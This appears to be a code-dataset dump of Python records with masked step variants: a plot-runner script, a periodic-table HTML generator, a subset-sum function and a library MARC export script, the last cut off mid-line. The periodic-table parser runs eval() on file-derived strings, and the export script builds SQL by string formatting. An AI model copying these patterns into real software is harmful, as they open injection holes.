outdir = "experiments/baseline"
test_id = "%010i" % (packet_count)
args.append( "%s/%s.stats %4.2fMB" % (outdir, test_id, i * 2048 / 1024.0 / 1024.0))
cmd = "./plot_fast_net.py RD %s baseline-rd.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,False)
cmd = "./plot_fast_net.py WR %s baseline-wr.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,True)
cmd = "./plot_fast_net.py APRD %s baseline-aprd.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,False)
cmd = "./plot_fast_net.py APWR %s baseline-apwr.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,True)
|
normal
|
{
"blob_id": "9101fc5b8ba04a1b72e0c79d5bf3e4118e1bad75",
"index": 5676,
"step-1": "#! /usr/bin/python\n\nimport math\nimport sys\nimport os\nimport subprocess\n\n\n#PTYPES = [ \"eth_ip_udp_head_t\", \"ip_udp_head_t\", \"eth_32ip_udp_head_t\", \"eth_64ip_udp_head_t\", \"eth64_64ip64_64udp_head_t\", \"eth6464_64ip64_64udp_head_t\" ]\n#PTYPES = [ \"eth_ip_udp_head_t\", \"eth_32ip_udp_head_t\", \"eth_64ip_udp_head_t\", \"eth64_64ip64_64udp_head_t\", \"eth6464_64ip64_64udp_head_t\" ]\nPTYPE = \"volatile eth_ip_udp_head_t\" \n#PTYPE = \"volatile eth6464_64ip64_64udp_head_t\" \n\ndef log_out(out): \n print(out[:-1])\n\n\ndef run_proc(p, wait):\n if not wait: \n pid = os.fork()\n if pid != 0:\n return\n\n \n proc = subprocess.Popen(p, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) \n proc.wait()\n\n log_out(\"STDERR -- %s\\n\" % p)\n for line in proc.stderr:\n log_out(line)\n\n log_out(\"STDOUT -- %s\\n\" % p)\n for line in proc.stdout:\n log_out(line)\n\n if not wait:\n\t sys.exit(0)\n\n\nargs = []\nfor i in [1,10] + \\\n range(100,1000,200) + \\\n range(1000,10 *1000, 1000) + \\\n range(10 * 1000,100 * 1000, 20 * 1000) + \\\n range(100 * 1000, 1000 * 1000, 200 * 1000) + \\\n range(1000 * 1000, 5 * 1000 * 1000, 2000 * 1000): \n packet_count = i \n\n outdir = \"experiments/baseline\"\n\n test_id = \"%010i\" % (packet_count)\n\n args.append( \"%s/%s.stats %4.2fMB\" % (outdir, test_id, i * 2048 / 1024.0 / 1024.0)) \n\n\ncmd = \"./plot_fast_net.py RD %s baseline-rd.pdf\" % (\" \".join(args) )\nprint cmd\nrun_proc(cmd,False)\n\ncmd = \"./plot_fast_net.py WR %s baseline-wr.pdf\" % (\" \".join(args) )\nprint cmd\nrun_proc(cmd,True)\n\ncmd = \"./plot_fast_net.py APRD %s baseline-aprd.pdf\" % (\" \".join(args) )\nprint cmd\nrun_proc(cmd,False)\n\ncmd = \"./plot_fast_net.py APWR %s baseline-apwr.pdf\" % (\" \".join(args) )\nprint cmd\nrun_proc(cmd,True)\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python3
import sys
class Parse:
data = []
def __parseLine(line):
"""Parse the given line"""
# extract name
name_len = line.index(" ")
name = line[:name_len]
line = line[name_len + 3:]
# array-ize 'electron' val
elec_pos = line.index("electron") + 9
line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'
# quote 'small' val
line = line.replace(' ', '')
line = line.replace('small:', 'small:"').replace(',molar', '",molar')
# quote all keys
for i in ["position", "number", "small", "molar", "electron"]:
line = line.replace(i, '"' + i + '"')
return eval('{"name":"' + name + '",' + line + '}')
def parseFile(filename):
"""Parse the given file"""
Parse.data = []
with open(filename, "r") as f:
for line in f:
Parse.data += [Parse.__parseLine(line)]
return Parse.data
class Write:
def __writeHeader(fd):
"""Write html header"""
print(
"<!DOCTYPE html>",
"<html>",
" <head>",
" <title>Super Tableau 3000</title>",
" <meta charset='utf-8' />",
" <style>", # ty alex for css!
" table { border-collapse: collapse; }",
" td { border: solid; }",
" h4, li { font-size:10px; }",
" .empty { border: 0px; }",
" </style>",
" </head>",
" <body>",
" <table>",
sep="\n",
file=fd
)
def __writeFooter(fd):
"""Write html footer"""
print(
" </table>",
" </body>",
"</html>",
sep="\n",
file=fd
)
def __openRow(fd):
"""Write opening html table row"""
print(" <tr>", file=fd)
def __closeRow(fd):
"""Write closing html table row"""
print(" </tr>", file=fd)
def __writeElement(fd, elm):
"""Write html table cell"""
print(
" <td>",
" <h4>" + elm["name"] + "</h4>",
" <ul>",
" <li>" + str(elm["number"]) + "</li>",
" <li>" + elm["small"] + "</li>",
" <li>" + str(elm["molar"]) + "</li>",
" </ul>",
" </td>",
sep="\n",
file=fd
)
def __writeEmptyElement(fd):
"""Write html empty table cell"""
print(" <td class='empty'></td>", file=fd)
def writeFile(filename):
"""Write our awesome html file"""
with open(filename, "w") as f:
Write.__writeHeader(f)
Write.__openRow(f)
i = 0
for elm in Parse.data:
while i != elm["position"]:
Write.__writeEmptyElement(f)
i += 1
Write.__writeElement(f, elm)
i += 1
if elm["position"] == 17:
i = 0
Write.__closeRow(f)
if elm["number"] != 118:
Write.__openRow(f)
Write.__writeFooter(f)
def doTheJob(input_file):
"""Do all we need"""
Parse.parseFile(input_file)
Write.writeFile(input_file.replace(".txt", ".html"))
if __name__ == '__main__':
if len(sys.argv) == 2:
doTheJob(sys.argv[1])
else:
doTheJob("./ex07/periodic_table.txt")
|
normal
|
{
"blob_id": "cb77696a90716acdee83a1cf6162a8f42c524e11",
"index": 7612,
"step-1": "<mask token>\n\n\nclass Write:\n\n def __writeHeader(fd):\n \"\"\"Write html header\"\"\"\n print('<!DOCTYPE html>', '<html>', ' <head>',\n ' <title>Super Tableau 3000</title>',\n \" <meta charset='utf-8' />\", ' <style>',\n ' table { border-collapse: collapse; }',\n ' td { border: solid; }', ' h4, li { font-size:10px; }',\n ' .empty { border: 0px; }', ' </style>', ' </head>',\n ' <body>', ' <table>', sep='\\n', file=fd)\n\n def __writeFooter(fd):\n \"\"\"Write html footer\"\"\"\n print(' </table>', ' </body>', '</html>', sep='\\n', file=fd)\n\n def __openRow(fd):\n \"\"\"Write opening html table row\"\"\"\n print(' <tr>', file=fd)\n\n def __closeRow(fd):\n \"\"\"Write closing html table row\"\"\"\n print(' </tr>', file=fd)\n\n def __writeElement(fd, elm):\n \"\"\"Write html table cell\"\"\"\n print(' <td>', ' <h4>' + elm['name'] + '</h4>', ' <ul>',\n ' <li>' + str(elm['number']) + '</li>', ' <li>' + elm\n ['small'] + '</li>', ' <li>' + str(elm['molar']) + '</li>',\n ' </ul>', ' </td>', sep='\\n', file=fd)\n\n def __writeEmptyElement(fd):\n \"\"\"Write html empty table cell\"\"\"\n print(\" <td class='empty'></td>\", file=fd)\n\n def writeFile(filename):\n \"\"\"Write our awesome html file\"\"\"\n with open(filename, 'w') as f:\n Write.__writeHeader(f)\n Write.__openRow(f)\n i = 0\n for elm in Parse.data:\n while i != elm['position']:\n Write.__writeEmptyElement(f)\n i += 1\n Write.__writeElement(f, elm)\n i += 1\n if elm['position'] == 17:\n i = 0\n Write.__closeRow(f)\n if elm['number'] != 118:\n Write.__openRow(f)\n Write.__writeFooter(f)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Parse:\n <mask token>\n\n def __parseLine(line):\n \"\"\"Parse the given line\"\"\"\n name_len = line.index(' ')\n name = line[:name_len]\n line = line[name_len + 3:]\n elec_pos = line.index('electron') + 9\n line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'\n line = line.replace(' ', '')\n line = line.replace('small:', 'small:\"').replace(',molar', '\",molar')\n for i in ['position', 'number', 'small', 'molar', 'electron']:\n line = line.replace(i, '\"' + i + '\"')\n return eval('{\"name\":\"' + name + '\",' + line + '}')\n\n def parseFile(filename):\n \"\"\"Parse the given file\"\"\"\n Parse.data = []\n with open(filename, 'r') as f:\n for line in f:\n Parse.data += [Parse.__parseLine(line)]\n return Parse.data\n\n\nclass Write:\n\n def __writeHeader(fd):\n \"\"\"Write html header\"\"\"\n print('<!DOCTYPE html>', '<html>', ' <head>',\n ' <title>Super Tableau 3000</title>',\n \" <meta charset='utf-8' />\", ' <style>',\n ' table { border-collapse: collapse; }',\n ' td { border: solid; }', ' h4, li { font-size:10px; }',\n ' .empty { border: 0px; }', ' </style>', ' </head>',\n ' <body>', ' <table>', sep='\\n', file=fd)\n\n def __writeFooter(fd):\n \"\"\"Write html footer\"\"\"\n print(' </table>', ' </body>', '</html>', sep='\\n', file=fd)\n\n def __openRow(fd):\n \"\"\"Write opening html table row\"\"\"\n print(' <tr>', file=fd)\n\n def __closeRow(fd):\n \"\"\"Write closing html table row\"\"\"\n print(' </tr>', file=fd)\n\n def __writeElement(fd, elm):\n \"\"\"Write html table cell\"\"\"\n print(' <td>', ' <h4>' + elm['name'] + '</h4>', ' <ul>',\n ' <li>' + str(elm['number']) + '</li>', ' <li>' + elm\n ['small'] + '</li>', ' <li>' + str(elm['molar']) + '</li>',\n ' </ul>', ' </td>', sep='\\n', file=fd)\n\n def __writeEmptyElement(fd):\n \"\"\"Write html empty table cell\"\"\"\n print(\" <td class='empty'></td>\", file=fd)\n\n def writeFile(filename):\n \"\"\"Write our awesome html file\"\"\"\n with open(filename, 'w') as f:\n Write.__writeHeader(f)\n Write.__openRow(f)\n i = 0\n for elm in Parse.data:\n while i != elm['position']:\n Write.__writeEmptyElement(f)\n i += 1\n Write.__writeElement(f, elm)\n i += 1\n if elm['position'] == 17:\n i = 0\n Write.__closeRow(f)\n if elm['number'] != 118:\n Write.__openRow(f)\n Write.__writeFooter(f)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Parse:\n data = []\n\n def __parseLine(line):\n \"\"\"Parse the given line\"\"\"\n name_len = line.index(' ')\n name = line[:name_len]\n line = line[name_len + 3:]\n elec_pos = line.index('electron') + 9\n line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'\n line = line.replace(' ', '')\n line = line.replace('small:', 'small:\"').replace(',molar', '\",molar')\n for i in ['position', 'number', 'small', 'molar', 'electron']:\n line = line.replace(i, '\"' + i + '\"')\n return eval('{\"name\":\"' + name + '\",' + line + '}')\n\n def parseFile(filename):\n \"\"\"Parse the given file\"\"\"\n Parse.data = []\n with open(filename, 'r') as f:\n for line in f:\n Parse.data += [Parse.__parseLine(line)]\n return Parse.data\n\n\nclass Write:\n\n def __writeHeader(fd):\n \"\"\"Write html header\"\"\"\n print('<!DOCTYPE html>', '<html>', ' <head>',\n ' <title>Super Tableau 3000</title>',\n \" <meta charset='utf-8' />\", ' <style>',\n ' table { border-collapse: collapse; }',\n ' td { border: solid; }', ' h4, li { font-size:10px; }',\n ' .empty { border: 0px; }', ' </style>', ' </head>',\n ' <body>', ' <table>', sep='\\n', file=fd)\n\n def __writeFooter(fd):\n \"\"\"Write html footer\"\"\"\n print(' </table>', ' </body>', '</html>', sep='\\n', file=fd)\n\n def __openRow(fd):\n \"\"\"Write opening html table row\"\"\"\n print(' <tr>', file=fd)\n\n def __closeRow(fd):\n \"\"\"Write closing html table row\"\"\"\n print(' </tr>', file=fd)\n\n def __writeElement(fd, elm):\n \"\"\"Write html table cell\"\"\"\n print(' <td>', ' <h4>' + elm['name'] + '</h4>', ' <ul>',\n ' <li>' + str(elm['number']) + '</li>', ' <li>' + elm\n ['small'] + '</li>', ' <li>' + str(elm['molar']) + '</li>',\n ' </ul>', ' </td>', sep='\\n', file=fd)\n\n def __writeEmptyElement(fd):\n \"\"\"Write html empty table cell\"\"\"\n print(\" <td class='empty'></td>\", file=fd)\n\n def writeFile(filename):\n \"\"\"Write our awesome html file\"\"\"\n with open(filename, 'w') as f:\n Write.__writeHeader(f)\n Write.__openRow(f)\n i = 0\n for elm in Parse.data:\n while i != elm['position']:\n Write.__writeEmptyElement(f)\n i += 1\n Write.__writeElement(f, elm)\n i += 1\n if elm['position'] == 17:\n i = 0\n Write.__closeRow(f)\n if elm['number'] != 118:\n Write.__openRow(f)\n Write.__writeFooter(f)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Parse:\n data = []\n\n def __parseLine(line):\n \"\"\"Parse the given line\"\"\"\n name_len = line.index(' ')\n name = line[:name_len]\n line = line[name_len + 3:]\n elec_pos = line.index('electron') + 9\n line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'\n line = line.replace(' ', '')\n line = line.replace('small:', 'small:\"').replace(',molar', '\",molar')\n for i in ['position', 'number', 'small', 'molar', 'electron']:\n line = line.replace(i, '\"' + i + '\"')\n return eval('{\"name\":\"' + name + '\",' + line + '}')\n\n def parseFile(filename):\n \"\"\"Parse the given file\"\"\"\n Parse.data = []\n with open(filename, 'r') as f:\n for line in f:\n Parse.data += [Parse.__parseLine(line)]\n return Parse.data\n\n\nclass Write:\n\n def __writeHeader(fd):\n \"\"\"Write html header\"\"\"\n print('<!DOCTYPE html>', '<html>', ' <head>',\n ' <title>Super Tableau 3000</title>',\n \" <meta charset='utf-8' />\", ' <style>',\n ' table { border-collapse: collapse; }',\n ' td { border: solid; }', ' h4, li { font-size:10px; }',\n ' .empty { border: 0px; }', ' </style>', ' </head>',\n ' <body>', ' <table>', sep='\\n', file=fd)\n\n def __writeFooter(fd):\n \"\"\"Write html footer\"\"\"\n print(' </table>', ' </body>', '</html>', sep='\\n', file=fd)\n\n def __openRow(fd):\n \"\"\"Write opening html table row\"\"\"\n print(' <tr>', file=fd)\n\n def __closeRow(fd):\n \"\"\"Write closing html table row\"\"\"\n print(' </tr>', file=fd)\n\n def __writeElement(fd, elm):\n \"\"\"Write html table cell\"\"\"\n print(' <td>', ' <h4>' + elm['name'] + '</h4>', ' <ul>',\n ' <li>' + str(elm['number']) + '</li>', ' <li>' + elm\n ['small'] + '</li>', ' <li>' + str(elm['molar']) + '</li>',\n ' </ul>', ' </td>', sep='\\n', file=fd)\n\n def __writeEmptyElement(fd):\n \"\"\"Write html empty table cell\"\"\"\n print(\" <td class='empty'></td>\", file=fd)\n\n def writeFile(filename):\n \"\"\"Write our awesome html file\"\"\"\n with open(filename, 'w') as f:\n Write.__writeHeader(f)\n Write.__openRow(f)\n i = 0\n for elm in Parse.data:\n while i != elm['position']:\n Write.__writeEmptyElement(f)\n i += 1\n Write.__writeElement(f, elm)\n i += 1\n if elm['position'] == 17:\n i = 0\n Write.__closeRow(f)\n if elm['number'] != 118:\n Write.__openRow(f)\n Write.__writeFooter(f)\n\n\ndef doTheJob(input_file):\n \"\"\"Do all we need\"\"\"\n Parse.parseFile(input_file)\n Write.writeFile(input_file.replace('.txt', '.html'))\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python3\n\nimport sys\n\n\nclass Parse:\n data = []\n\n def __parseLine(line):\n \"\"\"Parse the given line\"\"\"\n\n # extract name\n name_len = line.index(\" \")\n name = line[:name_len]\n line = line[name_len + 3:]\n\n # array-ize 'electron' val\n elec_pos = line.index(\"electron\") + 9\n line = line[:elec_pos] + '[' + line[elec_pos:].replace(' ', ',') + ']'\n\n # quote 'small' val\n line = line.replace(' ', '')\n line = line.replace('small:', 'small:\"').replace(',molar', '\",molar')\n\n # quote all keys\n for i in [\"position\", \"number\", \"small\", \"molar\", \"electron\"]:\n line = line.replace(i, '\"' + i + '\"')\n\n return eval('{\"name\":\"' + name + '\",' + line + '}')\n\n def parseFile(filename):\n \"\"\"Parse the given file\"\"\"\n\n Parse.data = []\n with open(filename, \"r\") as f:\n for line in f:\n Parse.data += [Parse.__parseLine(line)]\n return Parse.data\n\n\nclass Write:\n def __writeHeader(fd):\n \"\"\"Write html header\"\"\"\n\n print(\n \"<!DOCTYPE html>\",\n \"<html>\",\n \" <head>\",\n \" <title>Super Tableau 3000</title>\",\n \" <meta charset='utf-8' />\",\n \" <style>\", # ty alex for css!\n \" table { border-collapse: collapse; }\",\n \" td { border: solid; }\",\n \" h4, li { font-size:10px; }\",\n \" .empty { border: 0px; }\",\n \" </style>\",\n \" </head>\",\n \" <body>\",\n \" <table>\",\n sep=\"\\n\",\n file=fd\n )\n\n def __writeFooter(fd):\n \"\"\"Write html footer\"\"\"\n\n print(\n \" </table>\",\n \" </body>\",\n \"</html>\",\n sep=\"\\n\",\n file=fd\n )\n\n def __openRow(fd):\n \"\"\"Write opening html table row\"\"\"\n\n print(\" <tr>\", file=fd)\n\n def __closeRow(fd):\n \"\"\"Write closing html table row\"\"\"\n\n print(\" </tr>\", file=fd)\n\n def __writeElement(fd, elm):\n \"\"\"Write html table cell\"\"\"\n\n print(\n \" <td>\",\n \" <h4>\" + elm[\"name\"] + \"</h4>\",\n \" <ul>\",\n \" <li>\" + str(elm[\"number\"]) + \"</li>\",\n \" <li>\" + elm[\"small\"] + \"</li>\",\n \" <li>\" + str(elm[\"molar\"]) + \"</li>\",\n \" </ul>\",\n \" </td>\",\n sep=\"\\n\",\n file=fd\n )\n\n def __writeEmptyElement(fd):\n \"\"\"Write html empty table cell\"\"\"\n\n print(\" <td class='empty'></td>\", file=fd)\n\n def writeFile(filename):\n \"\"\"Write our awesome html file\"\"\"\n\n with open(filename, \"w\") as f:\n Write.__writeHeader(f)\n\n Write.__openRow(f)\n i = 0\n for elm in Parse.data:\n while i != elm[\"position\"]:\n Write.__writeEmptyElement(f)\n i += 1\n\n Write.__writeElement(f, elm)\n i += 1\n\n if elm[\"position\"] == 17:\n i = 0\n Write.__closeRow(f)\n if elm[\"number\"] != 118:\n Write.__openRow(f)\n\n Write.__writeFooter(f)\n\n\ndef doTheJob(input_file):\n \"\"\"Do all we need\"\"\"\n\n Parse.parseFile(input_file)\n Write.writeFile(input_file.replace(\".txt\", \".html\"))\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 2:\n doTheJob(sys.argv[1])\n else:\n doTheJob(\"./ex07/periodic_table.txt\")\n",
"step-ids": [
8,
11,
12,
13,
16
]
}
|
[
8,
11,
12,
13,
16
] |
#!/usr/bin/env python
def findSubset(s0, s, t):
mys0 = s0.copy()
mys = s.copy()
if t == 0 and mys0:
return mys0
elif t == 0: # and mys0 == set()
return True
else:
if len(mys) > 0:
p = mys.pop()
mys1 = mys0.copy()
mys1.add(p)
if t-p < 0:
return findSubset(mys0, mys, t)
else:
return findSubset(mys1, mys, t-p) or findSubset(mys0, mys, t)
else:
return False
if __name__ == "__main__":
candidate = set()
big = set([1,2,3,4,5,6])
total = 11
print(findSubset(candidate, big, total))
|
normal
|
{
"blob_id": "079610f2aaebec8c6e46ccf21a9d5728df1be8de",
"index": 4155,
"step-1": "<mask token>\n",
"step-2": "def findSubset(s0, s, t):\n mys0 = s0.copy()\n mys = s.copy()\n if t == 0 and mys0:\n return mys0\n elif t == 0:\n return True\n elif len(mys) > 0:\n p = mys.pop()\n mys1 = mys0.copy()\n mys1.add(p)\n if t - p < 0:\n return findSubset(mys0, mys, t)\n else:\n return findSubset(mys1, mys, t - p) or findSubset(mys0, mys, t)\n else:\n return False\n\n\n<mask token>\n",
"step-3": "def findSubset(s0, s, t):\n mys0 = s0.copy()\n mys = s.copy()\n if t == 0 and mys0:\n return mys0\n elif t == 0:\n return True\n elif len(mys) > 0:\n p = mys.pop()\n mys1 = mys0.copy()\n mys1.add(p)\n if t - p < 0:\n return findSubset(mys0, mys, t)\n else:\n return findSubset(mys1, mys, t - p) or findSubset(mys0, mys, t)\n else:\n return False\n\n\nif __name__ == '__main__':\n candidate = set()\n big = set([1, 2, 3, 4, 5, 6])\n total = 11\n print(findSubset(candidate, big, total))\n",
"step-4": "#!/usr/bin/env python\n\n\ndef findSubset(s0, s, t):\n\n mys0 = s0.copy()\n mys = s.copy()\n \n if t == 0 and mys0:\n return mys0\n elif t == 0: # and mys0 == set()\n return True\n else:\n if len(mys) > 0:\n p = mys.pop()\n mys1 = mys0.copy()\n mys1.add(p)\n if t-p < 0:\n return findSubset(mys0, mys, t)\n else:\n return findSubset(mys1, mys, t-p) or findSubset(mys0, mys, t)\n else:\n return False\n \n\n\nif __name__ == \"__main__\":\n\n candidate = set()\n big = set([1,2,3,4,5,6])\n total = 11\n print(findSubset(candidate, big, total))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import pymarc
from pymarc import JSONReader, Field, JSONWriter, XMLWriter
import psycopg2
import psycopg2.extras
import time
import logging
import json
#WRITTEN W/PYTHON 3.7.3
print("...starting export");
# constructing file and log name
timestr = time.strftime("%Y%m%d-%H%M%S")
logging.basicConfig(filename=timestr + "-export.log")
#LOCAL DB
DATABASE_HOST = "redacted"
DATABASE_USERNAME = "redacted"
DATABASE_PASSWORD = "redacted"
DATABASE_PORT = 5432
DATABASE_NAME = "redacted"
TENANT = "redacted"
count = 0
folio_db = psycopg2.connect(
user=DATABASE_USERNAME,
password=DATABASE_PASSWORD,
host=DATABASE_HOST,
port=DATABASE_PORT,
database=DATABASE_NAME
)
#init a list of material types
materialTypeLookup = {}
matCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)
select_all_mat = '''
select id, jsonb->>'name' as name from {}_mod_inventory_storage.material_type'''.format(TENANT)
matCursor.execute(select_all_mat)
materialTypes = matCursor.fetchall()
for m in materialTypes:
materialTypeLookup[m['id']] = m['name']
#init a list of locations
locLookup = {}
locCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)
select_all_loc = '''
select id, jsonb->>'name' as name from {}_mod_inventory_storage.location'''.format(TENANT)
locCursor.execute(select_all_loc)
locations = locCursor.fetchall()
for l in locations:
locLookup[l['id']] = l['name']
#init a list of call number types
callNoTypeLookup = {}
callNoTypeCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)
select_all_call_no_types = '''
select id, jsonb->>'name' as name from {}_mod_inventory_storage.call_number_type'''.format(TENANT)
callNoTypeCursor.execute(select_all_call_no_types)
callNoTypes = callNoTypeCursor.fetchall()
for c in callNoTypes:
callNoTypeLookup[c['id']] = c['name']
cursor = folio_db.cursor(name='folio',cursor_factory=psycopg2.extras.DictCursor)
#THIS COULD BE MODIFIED TO RETREIVE X NUMBER OF RECORDS PER FILE
cursor.itersize=300000
#from {}_mod_marc_storage.marc_record'''.format(TENANT)
select_ids_sql = '''
select
id,
instance_id
from {}_mod_source_record_storage.records_lb where state = {} and (suppress_discovery = False or suppress_discovery is null)'''.format(TENANT,"'ACTUAL'")
print("executing query")
cursor.execute(select_ids_sql)
while True:
print("in the while true - fetching...")
rows = cursor.fetchmany(cursor.itersize)
print("fetch is done")
marcRecordCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)
if rows:
save_file = timestr + "." + str(count) + ".json"
writer = open(save_file,'wt')
print("created the file: " + save_file)
count += 1
for row in rows:
try:
rowId = row['id'];
rowInstanceId = row['instance_id'];
if rowInstanceId == None:
logging.error("BAD RECORD: INSTANCE ID WAS NULL" + str(row))
continue
select_record_sql = '''
select id,
content as marc
from {}_mod_source_record_storage.marc_records_lb where
id = '{}' limit 1'''.format(TENANT, rowId)
#print(select_record_sql)
marcRecordCursor.execute(select_record_sql)
marcRow = marcRecordCursor.fetchone()
marcJsonAsString = json.dumps(marcRow['marc'])
marcString = marcJsonAsString.encode('utf-8').strip()
#print(marcJsonAsString);
for record in JSONReader(marcJsonAsString):
#write MARC JSON to output file
#ADD A 998 FOR EACH HOLDING RECORD
if record['6xx'] is not None:
logging.error("BAD RECORD: 6xx" + str(row))
continue
if record['4xx'] is not None:
logging.error("BAD RECORD: 4xx" + str(row))
continue
select_holding_sql = '''
select id, creation_date, callnumbertypeid,
jsonb->>'permanentLocationId' as permanentlocationid,
jsonb->'holdingsStatements' as holdingstatements,
jsonb->>'callNumber' as callNumber from
{}_mod_inventory_storage.holdings_record
where instanceid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)'''.format(TENANT,rowInstanceId)
#print(select_holding_sql)
marcRecordCursor.execute(select_holding_sql)
holdingRows = marcRecordCursor.fetchall()
for holding in holdingRows:
#print(holding['callnumber'])
holdingsStatements = holding['holdingstatements']
rowHoldingsId = holding['id']
newField = Field(tag = '998',
indicators = [' ',' '],
subfields = ['a',holding.get('callnumber',''),
'l',locLookup.get(holding.get('permanentlocationid',''),'')])
for statement in holdingsStatements:
if statement is not None:
newField.add_subfield('s',statement.get('statement','').replace('Extent of ownership:',''));
record.add_field(newField)
#ADD AN 952 FOR EACH ITEM
select_item_sql = '''
select id, materialtypeid,
jsonb->>'effectiveLocationId' as effectivelocationid,
jsonb->>'barcode' as barcode,
jsonb->'effectiveCallNumberComponents'->>'prefix' as prefix,
jsonb->'effectiveCallNumberComponents'->>'typeId' as callnotype,
jsonb->'effectiveCallNumberComponents'->>'callNumber' as callnumber
from {}_mod_inventory_storage.item where
holdingsrecordid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)'''.format(TENANT,rowHoldingsId)
#print(select_item_sql)
marcRecordCursor.execute(select_item_sql)
itemRows = marcRecordCursor.fetchall()
for item in itemRows:
callNoToUse = item.get('callnumber','na')
#print(callNoToUse)
prefix = item.get('prefix',None)
if (prefix is not None):
callNoToUse = prefix + " " + callNoToUse
record.add_field(
Field(tag = '952',
indicators = [' ',' '],
subfields = ['m',item.get('barcode',''),
'j',callNoTypeLookup.get(item.get('callnotype',''),''),
'd',locLookup.get(item.get('effectivelocationid'),''),
'i',materialTypeLookup.get(item.get('materialtypeid'),''),
'e',callNoToUse]))
if (len(record.leader) < 24):
logging.error("BAD LEADER" + record.leader + " " + str(row))
record.leader = "{:<24}".format(record.leader)
writer.write(record.as_json())
writer.write('\n')
except Exception as e:
print("ERROR PROCESSING ROW:" + str(row))
print(e)
if rowInstanceId == None:
rowInstanceId = "None" #FOR LOGGING
logging.error("UNABLE TO WRITE TO FILE: " + rowInstanceId)
logging.error(e)
continue
writer.close()
else:
print("in the else --> finishing")
break
if (folio_db):
cursor.close()
marcRecordCursor.close()
folio_db.close()
print("complete")
|
normal
|
{
"blob_id": "d81e8478d60c9ee778e1aeb0dd7b05f675e4ecad",
"index": 2306,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('...starting export')\n<mask token>\nlogging.basicConfig(filename=timestr + '-export.log')\n<mask token>\nmatCursor.execute(select_all_mat)\n<mask token>\nfor m in materialTypes:\n materialTypeLookup[m['id']] = m['name']\n<mask token>\nlocCursor.execute(select_all_loc)\n<mask token>\nfor l in locations:\n locLookup[l['id']] = l['name']\n<mask token>\ncallNoTypeCursor.execute(select_all_call_no_types)\n<mask token>\nfor c in callNoTypes:\n callNoTypeLookup[c['id']] = c['name']\n<mask token>\nprint('executing query')\ncursor.execute(select_ids_sql)\nwhile True:\n print('in the while true - fetching...')\n rows = cursor.fetchmany(cursor.itersize)\n print('fetch is done')\n marcRecordCursor = folio_db.cursor(cursor_factory=psycopg2.extras.\n DictCursor)\n if rows:\n save_file = timestr + '.' + str(count) + '.json'\n writer = open(save_file, 'wt')\n print('created the file: ' + save_file)\n count += 1\n for row in rows:\n try:\n rowId = row['id']\n rowInstanceId = row['instance_id']\n if rowInstanceId == None:\n logging.error('BAD RECORD: INSTANCE ID WAS NULL' + str(row)\n )\n continue\n select_record_sql = (\n \"\"\"\n\t\t\t\tselect id, \n\t\t\t\tcontent as marc\n\t\t\t\tfrom {}_mod_source_record_storage.marc_records_lb where \n\t\t\t\tid = '{}' limit 1\"\"\"\n .format(TENANT, rowId))\n marcRecordCursor.execute(select_record_sql)\n marcRow = marcRecordCursor.fetchone()\n marcJsonAsString = json.dumps(marcRow['marc'])\n marcString = marcJsonAsString.encode('utf-8').strip()\n for record in JSONReader(marcJsonAsString):\n if record['6xx'] is not None:\n logging.error('BAD RECORD: 6xx' + str(row))\n continue\n if record['4xx'] is not None:\n logging.error('BAD RECORD: 4xx' + str(row))\n continue\n select_holding_sql = (\n \"\"\"\n\t\t\t\t\tselect id, creation_date, callnumbertypeid, \n\t\t\t\t\tjsonb->>'permanentLocationId' as permanentlocationid, \n\t\t\t\t\tjsonb->'holdingsStatements' as holdingstatements,\n\t\t\t\t\tjsonb->>'callNumber' as callNumber from \n\t\t\t\t\t{}_mod_inventory_storage.holdings_record \n\t\t\t\t\twhere instanceid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowInstanceId))\n marcRecordCursor.execute(select_holding_sql)\n holdingRows = marcRecordCursor.fetchall()\n for holding in holdingRows:\n holdingsStatements = holding['holdingstatements']\n rowHoldingsId = holding['id']\n newField = Field(tag='998', indicators=[' ', ' '],\n subfields=['a', holding.get('callnumber', ''),\n 'l', locLookup.get(holding.get(\n 'permanentlocationid', ''), '')])\n for statement in holdingsStatements:\n if statement is not None:\n newField.add_subfield('s', statement.get(\n 'statement', '').replace(\n 'Extent of ownership:', ''))\n record.add_field(newField)\n select_item_sql = (\n \"\"\"\n\t\t\t\t\t\tselect id, materialtypeid, \n\t\t\t\t\t\tjsonb->>'effectiveLocationId' as effectivelocationid, \n\t\t\t\t\t\tjsonb->>'barcode' as barcode, \n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'prefix' as prefix,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'typeId' as callnotype,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'callNumber' as callnumber\n\t\t\t\t\t\tfrom {}_mod_inventory_storage.item where \n\t\t\t\t\t\tholdingsrecordid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowHoldingsId))\n marcRecordCursor.execute(select_item_sql)\n itemRows = marcRecordCursor.fetchall()\n for item in itemRows:\n callNoToUse = 